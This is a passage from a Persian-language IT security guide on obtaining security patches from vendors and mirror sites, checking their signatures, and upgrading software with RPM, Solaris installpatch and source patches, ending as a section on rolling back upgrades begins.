ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻫﺮﻳﻚ ﺍﺯ ﺍﺻﻼﺣﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ،ﻣﺠﺒﻮﺭ
ﻻ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ،ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﻳـﺎ
ﻫﺴﺘﻴﺪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ .ﻣﻌﻤﻮ ﹰ
ﻳﻚ ﭘﺎﻳﮕﺎﻩ FTPﻧﺎﺷﻨﺎﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ .ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ
ﻣﻲﮔﻴﺮﺩ ،ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﭘﺎﻳﮕﺎﻩ FTPﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﭘﺎﺳﺨﮕﻮﻱ ﺧﻴﻞ ﺗﻘﺎﺿﺎﻫﺎ ﺑﺮﺍﻱ downloadﺁﻥ ﺑﺎﺷـﺪ ،ﻟـﺬﺍ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺎﻳﺘﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ١١٣ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﻣﺸﺎﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ.
ﻻ ﻫـﺮ
ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺸﻮﻳﻖ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ )ﺩﺭ ﺟﻐﺮﺍﻓﻴﺎﻱ ﺷﺒﻜﻪ( downloadﻛﻨﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺍﺯ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺷﻨﺪﻩ )ﻣﻌﻤﻮ ﹰﻻ ﺑﻄﻮﺭ ﺭﻭﺯﺍﻧﻪ( ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ.
113 Mirror Sites
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺩﺭ ﺧﺼﻮﺹ ﺍﺻﻼﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺁﻣﻮﺧﺘﻴﺪ ،ﺗﺄﻣﻞ ﻧﻜﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﺁﻧﻬﺎ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ .ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻳﻲ ﻛـﻪ
ﺑﺼﻮﺭﺕ ﻋﻤﻮﻣﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻼﻓﺎﺻﻠﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ) .ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺍﺻﻼﺡ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻨﺪ ﺑﻪ ﺍﻳﻦ ﺍﻧﺪﺍﺯﻩ ﻓﻮﺭﻳﺖ ﻧﺪﺍﺭﻧﺪ(.
٣٠٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻥ ﻣﻴﺰﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ١١٤ﺍﺯ ﻃﺮﻳﻖ ﺗﻜﺮﺍﺭ ،ﻳﻚ ﻣﺰﻳـﺖ ﻣﻬـﻢ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺣـﺴﺎﺏ
ﻣﻲﺁﻳﻨﺪ .ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺍﺭﺗﺒﺎﻁ ﺳﺮﻳﻊ ﻭ ﺑﺎ ﭘﺎﻳﮕـﺎﻩ ﺍﺻـﻠﻲ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﭼﻨﺪ ﻧﮕﺮﺍﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ:
•
ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺧـﺮﺍﺏ ﻛﻨﻨـﺪ ،ﺑـﺎ
ﻳﻚ ﻧﺴﺨﺔ ﺁﻟﻮﺩﻩ ﺑﻪ ﺗﺮﺍﻭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ ،ﻭ . ...ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ ،ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺭﺍﻫﺒـﺮﺍﻥ
ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﻧﻴﺰ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻧﺮﺍ ﻧﻴﺰ ﻣﻨﺘﺸﺮ ﻛﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ
PGPﺑﻪ ﻫﻤﺮﺍﻩ ﺁﺭﺷﻴﻮﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﺍﻣﻀﺎﻫﺎﻱ gnupgﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ،rpmﻳﺎ ﺍﻣﻀﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ (ActiveXﭼـﻮﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ
ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺍﻭ ﻭ ﻧﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻳﺪ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻴﺸﺘﺮ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﺍﺻﻠﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﭘـﻴﺶ ﺍﺯ
ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎ ،ﺍﻣﻀﺎﻫﺎﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ.
•
ﺣﺘﻲ ﺍﮔﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﮑﺎﺳﻲ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻤﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ
ﻛﺎﻓﻲ ﺳﺮﻳﻊ ﻧﺒﺎﺷﺪ .ﺍﮔﺮ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﻣﻬﻢ ﻣﻨﺘﺸﺮ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺘﻮﺍﻧﻴﺪ ۲۴ﺳﺎﻋﺖ ﺻﺒﺮ ﻛﻨﻴﺪ ﻛﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ
ﻣﺤﻞ ﺷﻤﺎ ﺑﻪﺭﻭﺯ ﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍﻫﻲ ﺟﺰ downloadﻛﺮﺩﻥ ﺍﺻﻼﺣﻬﺎ ﺑﻄﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻓﺮﻭﺷـﻨﺪﺓ ﺍﺻـﻠﻲ ﻭﺟـﻮﺩ
ﻧﺪﺍﺭﺩ.
ﺩﺭ ﺍﻋﻤﺎﻝ ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﺑﻮﻟﺘﻨﻬﺎﻱ ﻋﻤﻮﻣﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ
ﺍﺻﻼﺣﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﺍ ﻓﺮﻳﺐ ﺩﻫﻨﺪ ﺗﺎ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺟﺪﻳﺪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻨـﺪ ،ﻭ ﺩﺭ ﺑﻬﺘـﺮﻳﻦ
ﻻ ﺑﻮﺳﻴﻠﻪ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﻲﺗﺠﺮﺑﻪﺍﻱ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺭﺍﻩﺣـﻞ
ﺣﺎﻟﺖ ﻣﻌﻤﻮ ﹰ
ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺍﺻﻼﺡ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ،ﺑﻪ ﺁﻥ ﺁﺳﻴﺐ ﺑﺮﺳﺎﻧﺪ.
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ
ﻻ ﻓﺮﺍﻳﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺍﻱ ﺍﺳﺖ .ﺑﻌﻨـﻮﺍﻥ
ﺗﺤﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ،Unixﺍﺭﺗﻘﺎﻱ ﻳﻚ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻌﻤﻮ ﹰ
ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ bzip2-develﺩﺭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ RPMﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺩﺳﺘﻮﺭﺍﺕ ﺯﻳﺮ
ﻻﺯﻡ ﻫﺴﺘﻨﺪ:
# ls -l *.rpm
-rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm
# rpm -K bzip2-devel-1.0.2-2.i386.rpm
)Check the checksum and signature
bzip2-devel-1.0.2-2.i386.rpm: md5 OK
# rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm
Upgrade the package
]Preparing... ########################################### [100%
]1:bzip2-devel ########################################### [100%
# rpm -q bzip2-devel
Confirm that the version is now 1.0.2-2
bzip2-devel-1.0.2-2
ﻧﺼﺐ ﻳﻚ ﺍﺻﻼﺡ ﺍﻣﻨﻴﺘﻲ Solarisﻧﻴﺰ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺁﺳﺎﻥ ﺍﺳـﺖ .ﺑﻌـﺪ ﺍﺯ downloadﺍﺻـﻼﺡ 104489-15.tar.Zﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
،http://sunsolve.sun.comﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ installpatchﺑﺮﺍﻱ ﻧﺼﺐ ﺍﺻﻼﺡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ:
% ls *.tar.Z
104489-15.tar.Z
% uncompress *.Z
% tar xf 104489-15.tar
% cd 104489-15
% ls
114 Software Availability
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٠٥
*.diPatch
*SUNWtltk/ backoutpatch* postbackout
*Install.info
*SUNWtltkd/ installpatch* postpatch
README.104489-15 SUNWtltkm/
*patchinfo
% su
Password: password
#./installpatch.
Checking installed patches...
Generating list of files to be patched...
Verifying sufficient filesystem capacity (exhaustive method)...
Installing patch packages...
Patch number 104489-15 has been successfully installed.
See /var/sadm/patch/104489-15/log for details
Executing postpatch script...
Patch packages installed:
SUNWtltk
SUNWtltkd
SUNWtltkm
# showrev -p | egrep 104489
Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd
Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
ﺍﮔﺮ ﺍﺯ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﻳﺎ ﺑﻪ ﻳﻚ ﻛﻨﺘﺮﻝ CVSﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﻭ ﻳـﺎ ﺑـﻪ ﺍﻋﻤـﺎﻝ
ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻗﺪﻳﻤﻲ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ .ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺗﺮﺟﻤـﻪ ﻭ ﺳـﭙﺲ
ﻧﺼﺐ ﺷﻮﺩ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻲ ﺍﺯ ﺍﻋﻤﺎﻝ ﻳﻚ ﺍﺻﻼﺡ ﺭﻭﻱ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻭﺭﺩﻩ ﺷﺪﻩ ﺍﺳﺖ:
ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺭﺍ ﺍﺭﺗﻘﺎ ﻣﻲﺩﻫﻴﺪ ،ﺑﺎﻳﺪ ﻓﺮﺍﻳﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻳﺪ ﻭ ﺁﻧﺮﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﺍﻧﺪﺍﺯﻳﺪ ﺗـﺎ ﻧـﺴﺨﻪﺍﻱ
ﮐﻪ ﺗﺎﺯﻩ ﻧﺼﺐﺷﺪﻩ ،ﺍﺟﺮﺍ ﺷﻮﺩ -ﺗﻌﻮﻳﺾ ﺻﺮﻑ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺮﺍﻱ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻥ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺑﺎ ﻧـﺴﺨﺔ
ﻗﺪﻳﻤﻲ ﻛﻔﺎﻳﺖ ﻧﻤﻲﻛﻨﺪ.
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻛﻤﻲ ﻧﺎﻣﺘﻌﺎﺭﻑﺗﺮ ﺍﺳـﺖ .ﺍﮔـﺮ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻳﻜـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻫﺴﺘﻪﺍﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ -ﻣﺎﻧﻨﺪ Internet Explorerﻳﺎ - Media Playerﺑﺎﺷﻨﺪ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻥ WindowsUpdateﺍﺩﺍﺭﺓ ﺁﻧﺮﺍ ﺑﺮ
ﻋﻬﺪﻩ ﻣﻲﮔﻴﺮﺩ؛ ﺍﻣﺎ ﻫﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﻳﮕﺮﻱ ﺑﺎﻳﺪ ﺭﻭﺵ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﺑﻌﻀﻲﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﻨﻨـﺪ ﻛـﻪ ﻧـﺴﺨﺔ
ﻗﺪﻳﻤﻲﺗﺮ ﺭﺍ uninstallﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﭘﺲ ﺍﺯ ﺁﻥ ﺍﺳﺖ ﮐﻪ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛـﺎﻓﻲ
ﺑﺎﺷﺪ ﻛﻪ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﻧﺴﺨﺔ ﻗﺪﻳﻤﻲ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﻭ ﺳﺎﻳﺮﻳﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻧﺪ ﺍﺭﺗﻘﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺮﻧﺎﻣﻪ-
ﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ( .ﺷﻤﺎ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﻪ ﺭﻭﺵ ﻣﺨﺼﻮﺹ ﺁﻥ ﻋﻤﻞ ﻛﻨﻴﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
* % ls -ld
-rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09
drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/
% cd pennmush
% patch -p1 -s <../1.7.5-patch09
% make
....source code compile messages...
% make install
...installation messages...
%
٣٠٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺑﻪ ﻋﻘﺐ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ
ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻫﻤﻴﺸﻪ ﭼﺎﺭﺓ ﻛﺎﺭ ﻧﻴﺴﺖ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺭﺗﻘﺎﻫﺎ ﺑﻴﺶ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺣﻞ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺟﺐ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺟﺪﻳﺪ ﺩﺭ ﺳﻴﺴﺘﻢ
ﻣﻲﺷﻮﻧﺪ؛ ﻳﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻣﻬﻢ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻣﻮﺟﺐ ﺍﺻﻼﺡ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ
ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﺍﺭﺗﻘﺎﻱ ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺣﺎﻭﻱ ﻣﺸﻜﻼﺕ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻞ ﺍﺯ ﺍﺭﺗﻘﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ.
ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺧﺮﺍﺏ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻥ ﺍﺻﻼﺡ ﺭﺍ ﺑﻪ ﻋﻘﺐ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ ﻭ ﻧﺴﺨﺔ ﻗﺒﻠـﻲ
